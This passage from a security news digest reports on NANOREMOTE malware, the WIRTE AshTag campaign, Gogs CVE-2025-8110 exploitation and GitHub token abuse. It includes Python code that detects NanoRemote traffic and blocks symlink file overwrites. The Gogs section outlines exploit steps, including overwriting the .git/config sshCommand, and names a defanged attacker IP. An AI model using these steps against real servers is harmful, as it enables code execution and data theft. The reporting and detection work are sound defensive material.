“The URI for all requests use /api/client with User-Agent (NanoRemote/1.0).” Its primary functionality is realized through a set of 22 command handlers that allow it to collect host information, carry out file and directory operations, run portable executable (PE) files already present on disk, clear cache, download/upload files to Google Drive, pause/resume/cancel data transfers, and terminate itself. Elastic said it identified an artifact (“wmsetup.log”) uploaded to VirusTotal from the Philippines on October 3, 2025, that’s capable of being decrypted by WMLOADER with the same 16-byte key to reveal a FINALDRAFT implant, indicating that the two malware families are likely the work of the same threat actor. It’s unclear as to why the same hard-coded key is being used across both of them. “Our hypothesis is that WMLOADER uses the same hard-coded key due to being part of the same build/development process that allows it to work with various payloads,” Stepanic said.
“This appears to be another strong signal suggesting a shared codebase and development environment between FINALDRAFT and NANOREMOTE.”
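The network indicators quoted above (POST requests to /api/client over plain HTTP, the NanoRemote/1.0 User-Agent, a non-routable destination) lend themselves to a simple hunt over proxy or flow logs. The following is an added example, not Elastic's detection logic: the JSON field names, the log lines and the reading of "non-routable" as private, loopback or link-local are assumptions made for illustration.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Indicators quoted in the article from Elastic Security Labs.
NANOREMOTE_UA = "NanoRemote/1.0"
NANOREMOTE_PATH = "/api/client"

# Assumption: "non-routable" means RFC 1918, loopback or link-local space
# (the article does not publish the hard-coded address).
NON_ROUTABLE = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                 "127.0.0.0/8", "169.254.0.0/16")]

# Constructed proxy records, one JSON object per line; field names are assumed.
SAMPLE_LOG = """\
{"ts":"2025-12-12T09:14:02Z","src":"10.20.1.44","dst":"10.0.5.23","scheme":"http","method":"POST","uri":"/api/client","ua":"NanoRemote/1.0"}
{"ts":"2025-12-12T09:14:09Z","src":"10.20.1.51","dst":"203.0.113.5","scheme":"https","method":"GET","uri":"/index.html","ua":"Mozilla/5.0"}
{"ts":"2025-12-12T09:15:40Z","src":"10.20.1.44","dst":"192.168.50.9","scheme":"http","method":"POST","uri":"/api/client?id=7","ua":"Mozilla/5.0"}
{"ts":"2025-12-12T09:16:02Z","src":"10.20.1.60","dst":"203.0.113.80","scheme":"https","method":"POST","uri":"/api/client","ua":"curl/8.5.0"}
{"ts":"2025-12-12T09:16:30Z","src":
{"ts":"2025-12-12T09:17:11Z","src":"10.20.1.44","dst":"10.0.5.23","scheme":"http","method":"GET","uri":"/health","ua":"NanoRemote/1.0"}
"""


def is_non_routable(addr):
    """True when addr parses as an IP inside one of the NON_ROUTABLE ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in NON_ROUTABLE)


def classify(rec):
    """Return (severity, reasons) for one parsed record, or None if clean."""
    reasons = []
    if NANOREMOTE_UA.lower() in str(rec.get("ua", "")).lower():
        reasons.append("user-agent")
    # Compare the path only, so a query string does not hide the match.
    path = urlsplit(str(rec.get("uri", ""))).path
    beacon_shape = (str(rec.get("method", "")).upper() == "POST"
                    and path == NANOREMOTE_PATH
                    and str(rec.get("scheme", "")).lower() == "http"
                    and is_non_routable(str(rec.get("dst", ""))))
    if beacon_shape:
        reasons.append("post-to-non-routable")
    if not reasons:
        return None
    # The User-Agent is the specific indicator; the request shape alone is
    # weaker because other software may expose an /api/client endpoint.
    return ("high" if "user-agent" in reasons else "medium"), reasons


def detect(log_text):
    """Return (findings, skipped) where skipped counts unparseable lines."""
    findings, skipped = [], 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            skipped += 1
            continue
        if not isinstance(rec, dict):
            skipped += 1
            continue
        verdict = classify(rec)
        if verdict:
            findings.append({"ts": rec.get("ts"), "src": rec.get("src"),
                             "dst": rec.get("dst"), "severity": verdict[0],
                             "reasons": verdict[1]})
    return findings, skipped


if __name__ == "__main__":
    hits, bad_lines = detect(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("unparseable lines:", bad_lines)
```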
The Impact of Robotic Process Automation (RPA) on Identity and Access Management
As enterprises refine their strategies for handling Non-Human Identities (NHIs), Robotic Process Automation (RPA) has become a powerful tool for streamlining operations and enhancing security. However, since RPA bots have varying levels of access to sensitive information, enterprises must be prepared to mitigate a variety of challenges. In large organizations, bots are starting to outnumber human employees, and without proper identity lifecycle management, these bots increase security risks. RPA impacts Identity and Access Management (IAM) by managing bot identities, enforcing least-privilege access and ensuring auditability across all accounts.
Continue reading to learn more about RPA, its challenges with IAM and best practices organizations should follow to secure RPA within IAM.
What is Robotic Process Automation (RPA)?
Robotic Process Automation (RPA) uses bots to automate repetitive tasks that are traditionally performed by human users. In the context of IAM, RPA plays an essential role in streamlining the user lifecycle, including provisioning, deprovisioning and secure access to credentials. These RPA bots act as NHIs and require governance just as human users do for authentication, access controls and privileged session monitoring. As RPA adoption grows, IAM systems must consistently manage both human identities and NHIs within a unified security framework. Here are the key benefits of RPA:
- Improved efficiency and speed: RPA automates time-consuming, repetitive tasks like provisioning and deprovisioning, enabling IT teams to focus on higher-priority tasks.
- Better accuracy: RPA minimizes human error and reduces the risk of misconfigurations by following pre-defined scripts. Bots also automate credential handling and eliminate common issues like password reuse.
- Enhanced security: RPA strengthens IAM by triggering immediate deprovisioning once an employee leaves an organization. Automated bots can also detect and respond to behavioral anomalies in real time, limiting the impact of unauthorized access.
- Stronger compliance: RPA supports regulatory compliance mandates by automatically logging every bot action and enforcing access policies. Combined with zero-trust security principles, RPA enables continuous verification of all identities — human or machine.
Challenges RPA introduces into IAM
As organizations scale their use of RPA, several challenges emerge that can weaken the efficiency of existing IAM strategies, including bot management, larger attack surfaces and integration difficulties.
Managing bots
RPA bots are taking on more critical tasks across enterprises, and managing their identities and access becomes a top priority. Unlike human users, bots work silently in the background but still require authentication and authorization. Without appropriate identity governance, improperly monitored bots can create security gaps within an organization’s IAM. A common problem is how bots store credentials, often embedding hardcoded passwords or API keys in scripts or configuration files.
Increased attack surface
Each RPA bot has a new NHI, and each NHI introduces a potential attack vector for cybercriminals to exploit. Without strictly enforcing the Principle of Least Privilege (PoLP), bots may be overprovisioned with access that exceeds their needs for repetitive tasks. If compromised, bots can be used to move laterally within a network or exfiltrate sensitive data. Securing bots’ privileged access and managing their credentials with Just-in-Time (JIT) access is crucial to maintaining zero-trust security.
Integration difficulties
Many legacy IAM systems were not built with modern RPA integrations in mind, making it challenging for enterprises to enforce consistent access policies across both human users and NHIs. Integration gaps can result in unmanaged credentials, insufficient audit trails and inconsistent enforcement of access controls. Without alignment between RPA and IAM, organizations risk having less visibility and inconsistencies across automated processes.
Best practices for securing RPA within IAM
Securing RPA within IAM requires more than just granting bots access; organizations must treat automated processes with the same attention to detail as they do for human users. Here are some best practices to ensure RPA deployments remain secure and aligned with zero-trust security principles.
1. Prioritize bot identities
Treating RPA bots as first-class identities is crucial to maintaining strong IAM. Since bots interact with core systems and often operate with elevated privileges, it’s important to ensure each bot has only the minimum level of access required for its specific task. Each bot should be assigned an identity with its own unique credentials so they are never shared or reused across other bots or services. This approach to bot management allows security teams to grant or revoke access without disrupting broader workflows and to better track each bot’s activities.
2. Use a secrets manager
RPA bots typically interact with critical systems and APIs, relying on credentials or SSH keys to function. Storing these secrets in plaintext configuration files or scripts makes them easy targets for cybercriminals and difficult to securely rotate. A dedicated secrets management tool like Keeper® ensures that all credentials are encrypted and centrally managed in a zero-knowledge vault. Secrets can be retrieved at runtime, so they never reside in memory or on a device.
3. Implement PAM
Bots that perform repetitive, administrative tasks often require privileged access, making Privileged Access Management (PAM) essential. PAM solutions should enforce JIT access, ensuring bots receive privileged access only when needed and for a limited time. With session monitoring and recording to maintain transparency and detect unusual bot activity, implementing PAM eliminates standing access and helps prevent privilege escalation.
4. Strengthen authentication with MFA
Human users managing RPA bots must be required to authenticate using Multi-Factor Authentication (MFA). Since MFA is not practical for bot accounts themselves, having an extra layer of protection for the users managing them helps prevent unauthorized access to critical systems, sensitive data and privileged credentials. In addition, organizations should adopt Zero-Trust Network Access (ZTNA) principles by continuously verifying bot identities and context, not only at login but throughout each privileged session.
Secure the future of automation with IAM
Automation continues to transform how enterprises operate, largely driven by the rise of NHIs like RPA bots. To keep up with this technological evolution, organizations must adjust their IAM strategies to accommodate and secure both human users and automated bots. KeeperPAM® helps enterprises close potential security gaps, such as credential theft and privilege misuse, by providing a unified platform for managing credentials, enforcing PoLP, monitoring privileged sessions and managing the full identity lifecycle of every identity — human or not.
This article is a contributed piece from one of our valued partners.
WIRTE Leverages AshenLoader Sideloading to Install the AshTag Espionage Backdoor
An advanced persistent threat (APT) known as WIRTE has been attributed to attacks targeting government and diplomatic entities across the Middle East with a previously undocumented malware suite dubbed AshTag since 2020. Palo Alto Networks Unit 42 is tracking the activity cluster under the name Ashen Lepus. Artifacts uploaded to the VirusTotal platform show that the threat actor has trained its sights on Oman and Morocco, indicating an expansion in operational scope beyond the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt. The company told The Hacker News it has observed “scores of unique lures” disseminated across the Middle East, indicating a “persistent and wide-reaching campaign” confined to government and diplomatic entities in the region.
More than a dozen entities are estimated to have been targeted, although it’s suspected that the real number could be higher. “Ashen Lepus remained persistently active throughout the Israel-Hamas conflict, distinguishing it from other affiliated groups whose activities decreased over the same period,” the cybersecurity company said in a report shared with The Hacker News. “Ashen Lepus continued with its campaign even after the October 2025 Gaza ceasefire, deploying newly developed malware variants and engaging in hands-on activity within victim environments.” WIRTE, which overlaps with an Arabic-speaking, politically motivated cluster known as Gaza Cyber Gang (aka Blackstem, Extreme Jackal, Molerats, or TA402), is assessed to be active since at least 2018. According to a report from Cybereason, both Molerats and APT-C-23 (aka Arid Viper, Desert Varnish, or Renegade Jackal) are two main sub-groups of the Hamas cyberwarfare division.
It’s primarily driven by espionage and intelligence collection, targeting government entities in the Middle East to meet its strategic objectives. “Specifically, the connection between WIRTE (Ashen Lepus) to the broader Gaza Cyber Gang is primarily evidenced by code overlaps and similarities,” Unit 42 researchers said. “This suggests that while they operate independently, the tools were developed by close entities and they likely share development resources. We have also seen overlap in other groups’ victimology.” In a report published in November 2024, Check Point attributed the hacking crew to destructive attacks exclusively aimed at Israeli entities to infect them with a custom wiper malware referred to as SameCoin, highlighting their ability to adapt and carry out both espionage and sabotage.
The long-running, elusive campaign detailed by Unit 42, going all the way back to 2018, has been found to leverage phishing emails with lures related to geopolitical affairs in the region. A recent increase in lures related to Turkey – e.g., “Partnership agreement between Morocco and Turkey” or “Draft resolutions concerning the State of Palestine” – suggests that entities in the country may be a new area of focus. The attack chains commence with a harmless PDF decoy that tricks recipients into downloading a RAR archive from a file-sharing service. Opening the archive triggers a chain of events that results in the deployment of AshTag.
This involves using a renamed benign binary to sideload a malicious DLL dubbed AshenLoader that, in addition to opening a decoy PDF file to keep up the ruse, contacts an external server to drop two more components, a legitimate executable and a DLL payload called AshenStager (aka stagerx64) that’s again sideloaded to launch the malware suite in memory to minimize forensic artifacts. AshTag is a modular .NET backdoor that’s designed to facilitate persistence and remote command execution, while masquerading as a legitimate VisualServer utility to fly under the radar. Internally, its features are realized by means of an AshenOrchestrator to enable communications and to run additional payloads in memory. These payloads serve different purposes:
- Persistence and process management
- Update and removal
- Screen capture
- File explorer and management
- System fingerprinting
In one case, Unit 42 said it observed the threat actor accessing a compromised machine to conduct hands-on data theft by staging documents of interest in the C:\Users\Public folder.
These files are said to have been downloaded from a victim’s email inbox, their end goal being the theft of diplomacy-related documents. The documents were then exfiltrated to an attacker-controlled server using the Rclone utility. It’s assessed that data theft has likely occurred across the broader victim population, particularly in environments where advanced detection capabilities are absent. “Ashen Lepus remains a persistent espionage actor, demonstrating a clear intent to continue its operations throughout the recent regional conflict – unlike other affiliated threat groups, whose activity significantly decreased,” the company concluded.
“The threat actors’ activities throughout the last two years in particular highlight their commitment to constant intelligence collection.”
Unpatched Gogs Zero-Day Exploited Across 700+ Instances Amid Active Attacks
A high-severity unpatched security vulnerability in Gogs has come under active exploitation, with more than 700 compromised instances accessible over the internet, according to new findings from Wiz. The flaw, tracked as CVE-2025-8110 (CVSS score: 8.7), is a case of file overwrite in the file update API of the Go-based self-hosted Git service. A fix for the issue is said to be currently in the works. The company said it accidentally discovered the zero-day flaw in July 2025 while investigating a malware infection on a customer’s machine.
“Improper symbolic link handling in the PutContents API in Gogs allows local execution of code,” according to a description of the vulnerability in CVE.org. The cloud security company said CVE-2025-8110 is a bypass for a previously patched remote code execution flaw (CVE-2024-55947, CVSS score: 8.7) that allows an attacker to write a file to an arbitrary path on the server and gain SSH access to the server. CVE-2024-55947 was addressed by the maintainers in December 2024. Wiz said the fix put in place by Gogs to resolve CVE-2024-55947 could be circumvented by taking advantage of the fact that Git (and therefore, Gogs) allows symbolic links to be used in git repositories, and those symlinks can point to files or directories outside the repository.
Additionally, the Gogs API allows file modification outside of the regular Git protocol. As a result, this failure to account for symlinks could be exploited by an attacker to achieve arbitrary code execution through a four-step process:
1. Create a standard git repository
2. Commit a single symbolic link pointing to a sensitive target
3. Use the PutContents API to write data to the symlink, causing the system to follow the link and overwrite the target file outside the repository
4. Overwrite “.git/config” (specifically the sshCommand) to execute arbitrary commands
As for the malware deployed in the activity, it’s assessed to be a payload based on Supershell, an open-source command-and-control (C2) framework often used by Chinese hacking groups that can establish a reverse SSH shell to an attacker-controlled server (“119.45.176[.]196”). Wiz said that the attackers behind the exploitation of CVE-2025-8110 left behind the created repositories (e.g., “IV79VAew / Km4zoh4s”) on the customer’s cloud workload when they could have taken steps to delete or mark them as private following the infection. This carelessness points to a “smash-and-grab” style campaign, it added.
In all, there are about 1,400 exposed Gogs instances, out of which more than 700 have exhibited signs of compromise, particularly the presence of 8-character random owner/repository names. All the identified repositories were created around July 10, 2025. “This suggests that a single actor, or perhaps a group of actors all using the same tooling, are responsible for all infections,” researchers Gili Tikochinski and Yaara Shriki said. Given that the vulnerability does not have a fix, it’s essential that users disable open-registration, limit exposure to the internet, and scan instances for repositories with random 8-character names.
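The root cause described above is a file-update API that follows symbolic links. As an added illustration (this is not Gogs code and not the pending fix), the Python sketch below shows one way such an API can refuse the write: it rejects any existing path component that is a symbolic link, blocks writes under .git, and opens the target with O_NOFOLLOW. The function names and the temporary worktree are constructed for the example, and a POSIX filesystem is assumed.

```python
import errno
import os
import stat
import tempfile


class UnsafePathError(Exception):
    """The requested path must not be written by the file-update API."""


def safe_write(worktree, rel_path, data):
    """Write data to rel_path under worktree, refusing symlinks and .git."""
    parts = rel_path.replace("\\", "/").split("/")
    if os.path.isabs(rel_path) or any(p in ("", ".", "..") for p in parts):
        raise UnsafePathError("path is absolute or not normalized")
    if any(p.lower() == ".git" for p in parts):
        raise UnsafePathError("writes under .git are refused")

    root = os.path.realpath(worktree)  # the root itself is trusted
    current = root
    for part in parts:
        current = os.path.join(current, part)
        try:
            mode = os.lstat(current).st_mode  # lstat does not follow links
        except FileNotFoundError:
            break  # nothing exists below this point, so nothing to follow
        if stat.S_ISLNK(mode):
            # A realpath containment check alone would still accept a link
            # that points at .git/config inside the worktree; refusing every
            # link covers that case as well as targets outside the tree.
            raise UnsafePathError("symbolic link in path: " + part)

    target = os.path.join(root, *parts)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    # O_NOFOLLOW closes the race on the final component; a swap of an
    # intermediate directory would need directory file descriptors.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(target, flags, 0o644)
    except OSError as exc:
        if exc.errno == errno.ELOOP:
            raise UnsafePathError("target became a symbolic link") from exc
        raise
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return target


def _read(path):
    with open(path) as handle:
        return handle.read()


def demo():
    """Constructed worktree: one link leaving the tree, one aimed at .git/config."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        outside = os.path.join(tmp, "outside.txt")
        with open(outside, "w") as handle:
            handle.write("original")
        worktree = os.path.join(tmp, "worktree")
        os.makedirs(os.path.join(worktree, ".git"))
        config = os.path.join(worktree, ".git", "config")
        with open(config, "w") as handle:
            handle.write("[core]\n")
        os.symlink(outside, os.path.join(worktree, "link_out"))
        os.symlink(os.path.join(".git", "config"),
                   os.path.join(worktree, "link_cfg"))
        for rel in ("docs/readme.md", "link_out", "link_cfg",
                    ".git/config", "../outside.txt"):
            try:
                safe_write(worktree, rel, b"new")
                results[rel] = "written"
            except UnsafePathError:
                results[rel] = "refused"
        results["outside_intact"] = _read(outside) == "original"
        results["config_intact"] = _read(config) == "[core]\n"
    return results


if __name__ == "__main__":
    print(demo())
```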
The disclosure comes as Wiz also warned that threat actors are targeting leaked GitHub Personal Access Tokens (PAT) as high-value entry points to obtain initial access to victim cloud environments and even leverage them for cross-cloud lateral movement from GitHub to Cloud Service Provider (CSP) control plane. The issue at hand is that a threat actor with basic read permissions via a PAT can use GitHub’s API code search to discover secret names embedded directly in a workflow’s YAML code. To complicate matters further, if the exploited PAT has write permissions, attackers can execute malicious code and remove traces of their malicious activity. “Attackers leveraged compromised PATs to discover GitHub Action Secrets names in the codebase, and used them in newly created malicious workflows to execute code and obtain CSP secrets,” researcher Shira Ayal said.
“Threat actors have also been observed exfiltrating secrets to a webhook endpoint they control, completely bypassing Action logs.”